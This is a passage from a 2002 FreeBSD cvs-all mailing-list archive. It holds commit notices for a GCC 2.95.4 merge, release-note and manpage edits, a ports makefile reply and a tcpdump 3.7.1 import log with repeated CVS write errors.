16:12:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9325537B401; Thu, 20 Jun 2002 16:12:37 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KNCbN96432; Thu, 20 Jun 2002 16:12:37 -0700 (PDT) (envelope-from obrien) Message-Id: <200206202312.g5KNCbN96432@freefall.freebsd.org> From: "David E. O'Brien" Date: Thu, 20 Jun 2002 16:12:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/gcc ChangeLog c-common.c c-lex.c c-parse.in cccp.c combine.c crtstuff.c cse.c except.c expr.c final.c flow.c function.c gcc.c install.texi invoke.texi jump.c loop.c regmove.c reload1.c rtl.h tm.texi toplev.c varasm.c ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/20 16:12:37 PDT Modified files: (Branch: RELENG_4) contrib/gcc ChangeLog c-common.c c-lex.c c-parse.in cccp.c combine.c crtstuff.c cse.c except.c expr.c final.c flow.c function.c gcc.c install.texi invoke.texi jump.c loop.c regmove.c reload1.c rtl.h tm.texi toplev.c varasm.c version.c contrib/gcc/config freebsd.h contrib/gcc/config/alpha freebsd.h contrib/gcc/config/i386 freebsd.h linux.h contrib/gcc/f version.c Log: MFC: update to Gcc 2.95.4 Revision Changes Path 1.1.1.8.2.6 +166 -0 src/contrib/gcc/ChangeLog 1.8.2.5 +11 -1 src/contrib/gcc/c-common.c 1.1.1.3.2.1 +5 -1 src/contrib/gcc/c-lex.c 1.1.1.3.2.1 +19 -7 src/contrib/gcc/c-parse.in 1.6.2.2 +5 -3 src/contrib/gcc/cccp.c 1.1.1.4.2.2 +28 -11 src/contrib/gcc/combine.c 1.9.2.3 +0 -8 src/contrib/gcc/config/alpha/freebsd.h 1.25.2.10 +8 -8 src/contrib/gcc/config/freebsd.h 1.34.2.5 +57 -38 src/contrib/gcc/config/i386/freebsd.h 1.1.1.4.2.1 +18 -0 src/contrib/gcc/config/i386/linux.h 1.1.1.3.2.1 +2 -13 src/contrib/gcc/crtstuff.c 1.1.1.6.2.2 +0 -2 src/contrib/gcc/cse.c 1.1.1.2.2.2 +4 -4 src/contrib/gcc/except.c 1.1.1.4.2.3 +12 -5 src/contrib/gcc/expr.c 1.1.1.3.2.2 +1 -1 src/contrib/gcc/f/version.c 1.7.2.3 +5 -3 src/contrib/gcc/final.c 1.1.1.3.2.2 +9 -1 src/contrib/gcc/flow.c 1.6.2.3 +79 -26 src/contrib/gcc/function.c 1.17.2.9 +42 -36 src/contrib/gcc/gcc.c 1.1.1.4.4.1 +127 -52 src/contrib/gcc/install.texi 1.6.2.3 +7 -1 src/contrib/gcc/invoke.texi 1.1.1.4.2.1 +20 -3 src/contrib/gcc/jump.c 1.1.1.7.2.2 +7 -1 src/contrib/gcc/loop.c 1.1.1.3.2.1 +9 -0 src/contrib/gcc/regmove.c 1.1.1.4.2.2 +33 -4 src/contrib/gcc/reload1.c 1.1.1.3.2.2 +6 -0 src/contrib/gcc/rtl.h 1.1.1.3.2.1 +7 -0 src/contrib/gcc/tm.texi 1.6.2.6 +13 -10 src/contrib/gcc/toplev.c 1.1.1.4.2.2 +2 -11 src/contrib/gcc/varasm.c 1.1.1.6.2.3 +3 -1 src/contrib/gcc/version.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16:14:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CDF9C37B406; Thu, 20 Jun 2002 16:13:31 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KNDVE96753; Thu, 20 Jun 2002 16:13:31 -0700 (PDT) (envelope-from obrien) Message-Id: <200206202313.g5KNDVE96753@freefall.freebsd.org> From: "David E. O'Brien" Date: Thu, 20 Jun 2002 16:13:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/lib/csu Makefile src/gnu/lib/libgcc Makefile src/gnu/usr.bin/cc Makefile.inc src/gnu/usr.bin/cc/c++ Makefile src/gnu/usr.bin/cc/cc Makefile src/gnu/usr.bin/cc/cc1 Makefile src/gnu/usr.bin/cc/cc1obj Makefile src/gnu/usr.bin/cc/cc1plus ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/20 16:13:31 PDT Modified files: (Branch: RELENG_4) gnu/lib/csu Makefile gnu/lib/libgcc Makefile gnu/usr.bin/cc Makefile.inc gnu/usr.bin/cc/c++ Makefile gnu/usr.bin/cc/cc Makefile gnu/usr.bin/cc/cc1 Makefile gnu/usr.bin/cc/cc1obj Makefile gnu/usr.bin/cc/cc1plus Makefile gnu/usr.bin/cc/cc_int Makefile gnu/usr.bin/cc/cc_tools Makefile Log: MFC: update to Gcc 2.95.4 Revision Changes Path 1.1.2.6 +2 -1 src/gnu/lib/csu/Makefile 1.31.2.2 +8 -9 src/gnu/lib/libgcc/Makefile 1.49.2.5 +12 -11 src/gnu/usr.bin/cc/Makefile.inc 1.16.2.2 +0 -0 src/gnu/usr.bin/cc/c++/Makefile 1.20.2.3 +2 -1 src/gnu/usr.bin/cc/cc/Makefile 1.18.2.2 +7 -11 src/gnu/usr.bin/cc/cc1/Makefile 1.11.2.2 +8 -11 src/gnu/usr.bin/cc/cc1obj/Makefile 1.22.2.1 +6 -7 src/gnu/usr.bin/cc/cc1plus/Makefile 1.25.2.4 +2 -2 src/gnu/usr.bin/cc/cc_int/Makefile 1.48.2.6 +22 -21 src/gnu/usr.bin/cc/cc_tools/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16:44:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 70AF337B404; Thu, 20 Jun 2002 16:44:19 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KNiJW99748; Thu, 20 Jun 2002 16:44:19 -0700 (PDT) (envelope-from bmah) Message-Id: <200206202344.g5KNiJW99748@freefall.freebsd.org> From: "Bruce A. Mah" Date: Thu, 20 Jun 2002 16:44:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/20 16:44:19 PDT Modified files: release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: Release note added: rc.d. MFCs noted: fold(1) -b/-s, pwd(1) -L, renice(8) -n, unexpand(1) -t, xargs(1) -I/-L. Revision Changes Path 1.371 +21 -7 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16:46: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A0D9237B412; Thu, 20 Jun 2002 16:45:58 -0700 (PDT) Received: (from charnier@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KNjwG00362; Thu, 20 Jun 2002 16:45:58 -0700 (PDT) (envelope-from charnier) Message-Id: <200206202345.g5KNjwG00362@freefall.freebsd.org> From: Philippe Charnier Date: Thu, 20 Jun 2002 16:45:58 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/basename basename.1 src/usr.bin/biff biff.1 src/usr.bin/cap_mkdb cap_mkdb.1 src/usr.bin/checknr checknr.1 src/usr.bin/chkey chkey.1 src/usr.bin/chpass chpass.1 src/usr.bin/col col.1 src/usr.bin/colcrt colcrt.1 ... X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG charnier 2002/06/20 16:45:58 PDT Modified files: (Branch: RELENG_4) usr.bin/basename basename.1 usr.bin/biff biff.1 usr.bin/cap_mkdb cap_mkdb.1 usr.bin/checknr checknr.1 usr.bin/chkey chkey.1 usr.bin/chpass chpass.1 usr.bin/col col.1 usr.bin/colcrt colcrt.1 usr.bin/colldef colldef.1 usr.bin/colrm colrm.1 usr.bin/comm comm.1 usr.bin/compress compress.1 usr.bin/ctags ctags.1 usr.bin/doscmd doscmd.1 usr.bin/du du.1 usr.bin/ee ee.1 usr.bin/enigma enigma.1 usr.bin/fetch fetch.1 usr.bin/file file.1 usr.bin/find find.1 usr.bin/finger finger.1 Log: The .Nm utility Revision Changes Path 1.6.2.6 +8 -6 src/usr.bin/basename/basename.1 1.8.2.5 +6 -4 src/usr.bin/biff/biff.1 1.7.2.5 +4 -3 src/usr.bin/cap_mkdb/cap_mkdb.1 1.5.2.4 +10 -7 src/usr.bin/checknr/checknr.1 1.4.2.3 +4 -3 src/usr.bin/chkey/chkey.1 1.23.2.8 +16 -11 src/usr.bin/chpass/chpass.1 1.4.2.6 +9 -6 src/usr.bin/col/col.1 1.4.2.5 +4 -3 src/usr.bin/colcrt/colcrt.1 1.8.2.4 +10 -7 src/usr.bin/colldef/colldef.1 1.3.2.4 +4 -3 src/usr.bin/colrm/colrm.1 1.4.2.4 +4 -3 src/usr.bin/comm/comm.1 1.4.2.7 +9 -6 src/usr.bin/compress/compress.1 1.5.2.5 +4 -2 src/usr.bin/ctags/ctags.1 1.12.2.11 +6 -4 src/usr.bin/doscmd/doscmd.1 1.15.2.8 +4 -3 src/usr.bin/du/du.1 1.8.2.6 +9 -6 src/usr.bin/ee/ee.1 1.5.2.2 +4 -3 src/usr.bin/enigma/enigma.1 1.33.2.11 +3 -2 src/usr.bin/fetch/fetch.1 1.16.2.9 +4 -6 src/usr.bin/file/file.1 1.23.2.17 +3 -2 src/usr.bin/find/find.1 1.9.2.9 +8 -7 src/usr.bin/finger/finger.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 16:57:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DDDC037B407; Thu, 20 Jun 2002 16:57:18 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KNvIp01496; Thu, 20 Jun 2002 16:57:18 -0700 (PDT) (envelope-from marcus) Message-Id: <200206202357.g5KNvIp01496@freefall.freebsd.org> From: Joe Marcus Clarke Date: Thu, 20 Jun 2002 16:57:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11/gnome2 Makefile pkg-install X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/20 16:57:18 PDT Modified files: x11/gnome2 Makefile Added files: x11/gnome2 pkg-install Log: Make the GNOME 1.x warning package-safe. Suggested by: Cyrille Lefevre Revision Changes Path 1.44 +3 -13 ports/x11/gnome2/Makefile 1.1 +21 -0 ports/x11/gnome2/pkg-install (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:10:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C81037B425; Thu, 20 Jun 2002 17:10:02 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L0A2j06495; Thu, 20 Jun 2002 17:10:02 -0700 (PDT) (envelope-from obrien) Message-Id: <200206210010.g5L0A2j06495@freefall.freebsd.org> From: "David E. O'Brien" Date: Thu, 20 Jun 2002 17:10:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT avail X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/20 17:10:02 PDT Modified files: . avail Log: People's gratiuous commits have caused us to not get an updated tcpdump import due to the pain of 30 conflicts. So prevent anyone from creating the 31st conflict. While I'm here take preventive measures for binutils and file. Revision Changes Path 1.187 +4 -0 CVSROOT/avail To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:15: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 658CF37B410; Thu, 20 Jun 2002 17:14:56 -0700 (PDT) Received: (from bmah@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L0EuY07247; Thu, 20 Jun 2002 17:14:56 -0700 (PDT) (envelope-from bmah) Message-Id: <200206210014.g5L0EuY07247@freefall.freebsd.org> From: "Bruce A. Mah" Date: Thu, 20 Jun 2002 17:14:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/doc/en_US.ISO8859-1/relnotes/common new.sgml X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bmah 2002/06/20 17:14:56 PDT Modified files: (Branch: RELENG_4) release/doc/en_US.ISO8859-1/relnotes/common new.sgml Log: New release notes: su(1) KerberosV authentication, gcc-2.95.4, lukemftpd(8) 1.2 beta 1. MFC: fold(1) -b/-s, pwd(1) -L, renice(8) -n, unexpand(1) -t, xargs(1) -I/-L. Revision Changes Path 1.22.2.252 +34 -3 src/release/doc/en_US.ISO8859-1/relnotes/common/new.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:18:20 2002 Delivered-To: cvs-all@freebsd.org Received: from Awfulhak.org (gw.Awfulhak.org [217.204.245.18]) by hub.freebsd.org (Postfix) with ESMTP id 7202B37B40F; Thu, 20 Jun 2002 17:18:10 -0700 (PDT) Received: from hak.lan.Awfulhak.org (root@hak.lan.Awfulhak.org [IPv6:fec0::1:12]) by Awfulhak.org (8.12.3/8.12.3) with ESMTP id g5L0I8Mt027342; Fri, 21 Jun 2002 01:18:08 +0100 (BST) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [IPv6:::1]) by hak.lan.Awfulhak.org (8.12.4/8.12.4) with SMTP id g5L0I6mv080437; Fri, 21 Jun 2002 01:18:06 +0100 (BST) (envelope-from brian@Awfulhak.org) Date: Fri, 21 Jun 2002 01:18:06 +0100 From: Brian Somers To: Maxim Sobolev Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/Mk bsd.port.mk Message-Id: <20020621011806.29559271.brian@Awfulhak.org> In-Reply-To: <200206190821.g5J8LRM38683@freefall.freebsd.org> References: <200206190821.g5J8LRM38683@freefall.freebsd.org> X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd5.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This seemed to fail with RINPLACE_CMD being undefined when USE_REINPLACE is undefined and gets stuck in an infinite loop (sed_inplace seemed to depend on itself) when USE_REINPLACE is defined but sed_inplace isn't installed. Installing sed_inplace manually and then doing make -DUSE_REINPLACE worked. On Wed, 19 Jun 2002 01:21:27 -0700 (PDT), Maxim Sobolev wrote: > sobomax 2002/06/19 01:21:27 PDT > > Modified files: > Mk bsd.port.mk > Log: > Change the way REINPLACE_CMD works - instead of using perl(1) on systems > where sed(1) can't do in-place editing add a new USE_REINPLACE knob, which > if turned on defines REINPLACE_CMD and adds textproc/sed_inplace port into > BUILD_DEPENDS if necessary. > > Not objected by: portmgr@ > > Revision Changes Path > 1.415 +11 -7 ports/Mk/bsd.port.mk -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 17:41:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1A35B37B40B; Thu, 20 Jun 2002 17:40:46 -0700 (PDT) Received: (from fenner@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L0ek609228; Thu, 20 Jun 2002 17:40:46 -0700 (PDT) (envelope-from fenner) Message-Id: <200206210040.g5L0ek609228@freefall.freebsd.org> From: Bill Fenner Date: Thu, 20 Jun 2002 17:40:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: contrib/tcpdump - Imported sources X-FreeBSD-CVS-Branch: TCPDUMP_ORG Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG fenner 2002/06/20 17:40:45 PDT contrib/tcpdump - Imported sources Update of /home/ncvs/contrib/tcpdump In directory freefall.freebsd.org:/c/tmp/cvs-serv9214 Log Message: Import tcpdump 3.7.1, from http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz Status: Vendor Tag: TCPDUMP_ORG Release Tags: tcpdump_3_7_1 N contrib/tcpdump/.cvsignore cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/.cvsignore,v: No such file or directory N contrib/tcpdump/CHANGES cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/CHANGES,v: No such file or directory N contrib/tcpdump/CREDITS cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/CREDITS,v: No such file or directory N contrib/tcpdump/FILES cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/FILES,v: No such file or directory N contrib/tcpdump/INSTALL cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/INSTALL,v: No such file or directory N contrib/tcpdump/LICENSE cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/LICENSE,v: No such file or directory N contrib/tcpdump/Makefile-devel-adds cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/Makefile-devel-adds,v: No such file or directory N contrib/tcpdump/Makefile.in cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/Makefile.in,v: No such file or directory N contrib/tcpdump/PLATFORMS cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/PLATFORMS,v: No such file or directory N contrib/tcpdump/README cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/README,v: No such file or directory N contrib/tcpdump/TODO cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/TODO,v: No such file or directory N contrib/tcpdump/VERSION cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/VERSION,v: No such file or directory N contrib/tcpdump/acconfig.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/acconfig.h,v: No such file or directory N contrib/tcpdump/aclocal.m4 cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/aclocal.m4,v: No such file or directory N contrib/tcpdump/addrtoname.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/addrtoname.c,v: No such file or directory N contrib/tcpdump/addrtoname.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/addrtoname.h,v: No such file or directory N contrib/tcpdump/ah.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ah.h,v: No such file or directory N contrib/tcpdump/appletalk.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/appletalk.h,v: No such file or directory N contrib/tcpdump/arcnet.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/arcnet.h,v: No such file or directory N contrib/tcpdump/atime.awk cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/atime.awk,v: No such file or directory N contrib/tcpdump/bootp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/bootp.h,v: No such file or directory N contrib/tcpdump/bpf_dump.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/bpf_dump.c,v: No such file or directory N contrib/tcpdump/chdlc.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/chdlc.h,v: No such file or directory N contrib/tcpdump/config.h.in cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/config.h.in,v: No such file or directory N contrib/tcpdump/config.guess cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/config.guess,v: No such file or directory N contrib/tcpdump/config.sub cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/config.sub,v: No such file or directory N contrib/tcpdump/configure cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/configure,v: No such file or directory N contrib/tcpdump/configure.in cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/configure.in,v: No such file or directory N contrib/tcpdump/decnet.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/decnet.h,v: No such file or directory N contrib/tcpdump/dhcp6.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/dhcp6.h,v: No such file or directory N contrib/tcpdump/dhcp6opt.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/dhcp6opt.h,v: No such file or directory N contrib/tcpdump/esp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/esp.h,v: No such file or directory N contrib/tcpdump/ether.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ether.h,v: No such file or directory N contrib/tcpdump/ethertype.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ethertype.h,v: No such file or directory N contrib/tcpdump/extract.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/extract.h,v: No such file or directory N contrib/tcpdump/fddi.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/fddi.h,v: No such file or directory N contrib/tcpdump/gmt2local.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/gmt2local.c,v: No such file or directory N contrib/tcpdump/gmt2local.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/gmt2local.h,v: No such file or directory N contrib/tcpdump/icmp6.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/icmp6.h,v: No such file or directory N contrib/tcpdump/ieee802_11.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ieee802_11.h,v: No such file or directory N contrib/tcpdump/igrp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/igrp.h,v: No such file or directory N contrib/tcpdump/install-sh cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/install-sh,v: No such file or directory N contrib/tcpdump/interface.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/interface.h,v: No such file or directory N contrib/tcpdump/ip.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ip.h,v: No such file or directory N contrib/tcpdump/ip6.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ip6.h,v: No such file or directory N contrib/tcpdump/ipsec_doi.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ipsec_doi.h,v: No such file or directory N contrib/tcpdump/ipx.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ipx.h,v: No such file or directory N contrib/tcpdump/isakmp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/isakmp.h,v: No such file or directory N contrib/tcpdump/l2tp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/l2tp.h,v: No such file or directory N contrib/tcpdump/lane.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/lane.h,v: No such file or directory N contrib/tcpdump/llc.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/llc.h,v: No such file or directory N contrib/tcpdump/machdep.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/machdep.c,v: No such file or directory N contrib/tcpdump/machdep.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/machdep.h,v: No such file or directory N contrib/tcpdump/makemib cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/makemib,v: No such file or directory N contrib/tcpdump/mib.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/mib.h,v: No such file or directory N contrib/tcpdump/mkdep cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/mkdep,v: No such file or directory N contrib/tcpdump/nameser.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/nameser.h,v: No such file or directory N contrib/tcpdump/netbios.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/netbios.h,v: No such file or directory N contrib/tcpdump/nfs.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/nfs.h,v: No such file or directory N contrib/tcpdump/nfsfh.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/nfsfh.h,v: No such file or directory N contrib/tcpdump/ntp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ntp.h,v: No such file or directory N contrib/tcpdump/oakley.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/oakley.h,v: No such file or directory N contrib/tcpdump/ospf.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ospf.h,v: No such file or directory N contrib/tcpdump/ospf6.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ospf6.h,v: No such file or directory N contrib/tcpdump/packetdat.awk cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/packetdat.awk,v: No such file or directory N contrib/tcpdump/parsenfsfh.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/parsenfsfh.c,v: No such file or directory N contrib/tcpdump/ppp.h cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/ppp.h,v: No such file or directory N contrib/tcpdump/print-802_11.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-802_11.c,v: No such file or directory N contrib/tcpdump/print-ah.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ah.c,v: No such file or directory N contrib/tcpdump/print-arcnet.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-arcnet.c,v: No such file or directory N contrib/tcpdump/print-arp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-arp.c,v: No such file or directory N contrib/tcpdump/print-ascii.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-ascii.c,v: No such file or directory N contrib/tcpdump/print-atalk.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-atalk.c,v: No such file or directory N contrib/tcpdump/print-atm.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-atm.c,v: No such file or directory N contrib/tcpdump/print-beep.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-beep.c,v: No such file or directory N contrib/tcpdump/print-bgp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-bgp.c,v: No such file or directory N contrib/tcpdump/print-cdp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-cdp.c,v: No such file or directory N contrib/tcpdump/print-cip.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-cip.c,v: No such file or directory N contrib/tcpdump/print-bootp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-bootp.c,v: No such file or directory N contrib/tcpdump/print-chdlc.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-chdlc.c,v: No such file or directory N contrib/tcpdump/print-cnfp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-cnfp.c,v: No such file or directory N contrib/tcpdump/print-decnet.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-decnet.c,v: No such file or directory N contrib/tcpdump/print-dhcp6.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-dhcp6.c,v: No such file or directory N contrib/tcpdump/print-domain.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-domain.c,v: No such file or directory N contrib/tcpdump/print-dvmrp.c cvs: ERROR: cannot write file /home/ncvs/contrib/tcpdump/print-dvmrp.c,v: No such file or directory N contrib/tcpdump/print-egp.c cvs: ERROR: cannot write file 